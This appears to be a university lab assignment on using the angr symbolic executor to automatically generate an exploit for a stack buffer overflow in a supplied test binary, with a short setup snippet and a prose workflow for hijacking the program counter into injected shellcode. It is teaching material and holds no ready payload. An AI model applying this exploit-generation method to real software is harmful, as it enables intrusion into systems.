Lab3: Automated Exploit Generation

Download the testing case from here. You need a Linux environment for all the labs.

0. Preparation

First, we are going to use Angr to perform symbolic execution to automatically generate a successful exploit. Angr is not the fastest but it’s based on python, so it’s easy to use.

Following the instructions at https://angr.io/ to install Angr.

UPDATE: it turns out angr does not support gets used in the example. To fix this, download the implementation and add these lines in your exploit script to register the handler before creating the project object.

import angr
from gets import gets

angr.SIM_LIBRARIES["libc.so.6"].add("gets", gets)

proj = angr.Project("example01")

1. Objectives

Our objective for this lab assignment is to learn how to use a symbolic executor to generate exploit against a stack buffer overflow vulnerability. Generally, this includes three steps: finding the vulnerability, finding where to inject the shellcode, and guiding the execution to injected shellcode.

Angr already provides many good tutorials on how to use it to perform reverse engineering, including how to generate exploit.

2. Workflow

Step one, try to find an execution trace that would allow you to control the program counter (PC). To do so, we let Angr perform path exploration to find a simulation state is unconstrained. This is similar to the taint checker paper we have discussed. Note that Angr considers a state is unconstrained when the PC is symbolic (i.e., under control of inputs), but such control could be partial (e.g., when only one byte of the return address is overflowed). While such state could still be exploitable, to make the exploit easier, you can further check if all the bytes are symbolic.

Once you’ve find a program state that could be exploitable, the next step is to find a location to inject your shellcode. To do so, you can search the virtual memory to find a sequence of continuous of symbolic/tainted bytes that would be large enough to host the shellcode (e.g., like this). Then, we check whether it is feasible to control the symbolic bytes so they can be interpreted as shellcode. This should be straightforward if the bytes are directly copied from the input. But for programs that perform transformation over input, this could be challenging.

The last step is to connect the symbolic PC to the location of the shellcode, by adding the constraint that the PC should equal to the buffer that holds the shellcode. Finally, we ask the SMT solver to give us a feasible assignment to the input bytes so all the conditions (1. control PC, 2. shellcode, 3. PC to shellcode) would be satisfied.

3. Submission

Please submit your report through iLearn, preferably in PDF format. In the report, please list your complete source code with sufficient explanation and output messages.